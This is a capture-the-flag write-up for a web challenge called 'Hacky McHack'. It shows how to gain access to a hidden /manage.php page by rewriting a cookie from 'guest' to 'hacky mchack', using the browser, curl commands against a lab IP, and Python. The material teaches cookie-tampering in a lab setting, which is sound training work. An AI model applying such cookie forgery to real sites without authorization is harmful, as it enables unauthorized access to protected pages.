Skip to main content

Chef Hacky McHack

We'll solve this task in 3 ways: from the browser, from the CLI and using Python. That good we are!

Virgin: From the Browser

We visit to the URL, open the Developer Tools and go over to the "Storage" tab. There we see the server has given ass the cookie u=guest.

Hacky McHack - Initial Cookie

Since the challenge is called "Hacky McHack" we set the cookie value to hacky mchack. We notice a new tab has appeared at the top of the page or by inspecting the HTML source: Manage (/manage.php). We click on it and get the flag.

<ul class="nav-menu list-unstyled">
    <li><a href="index.php" class="smoothScroll">Home</a></li>
    <li><a href="#about" class="smoothScroll">About</a></li>
    <li><a href="#portfolio" class="smoothScroll">Portfolio</a></li>
    <li><a href="#journal" class="smoothScroll">Blog</a></li>
    <li><a href="#contact" class="smoothScroll">Contact</a></li>
        <li><a href="manage.php" class="smoothScroll">Manage</a></li>
    </ul>

Chad v1: From the CLI

We use our good friend curl. First, we save the cookies from the initial page into a cookie jar.

root@kali:~# curl -c cookies.txt http://141.85.224.70:8010
[...]

root@kali:~# cat cookies.txt
# Netscape HTTP Cookie File
# https://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

http://141.85.224.70:8010 FALSE / FALSE 1656864260 u guest

Now we edit the file and replace guest with hacky mchack and send a GET request to /manage.php.

root@kali:~# sed -i s/guest/hacky\ mchack/ cookies.txt

root@kali:~# curl -b cookies.txt http://141.85.224.70:8010/manage.php

If we didn't want to use the cookie jar, we could have simply looked at the headers sent by the server then sent the cookie "manually":

root@kali:~# curl -v http://141.85.224.70:8010 > /dev/null  # we don't care about the output
[...]
< HTTP/1.1 200 OK
< Date: Sun, 03 Jul 2022 16:10:51 GMT
< Server: Apache/2.4.38 (Debian)
< X-Powered-By: PHP/7.2.34
< Set-Cookie: u=guest; expires=Sun, 03-Jul-2022 16:11:51 GMT; Max-Age=60

root@kali:~# curl -b 'u=hacky mchack' $URL/manage.php  # Notice the Set-Cookie field above
<here we get the flag>

Chad v2: From Python

Simply create a Session object, set the cookie u to hacky mchack, then send a GET request to the /manage.php endpoint.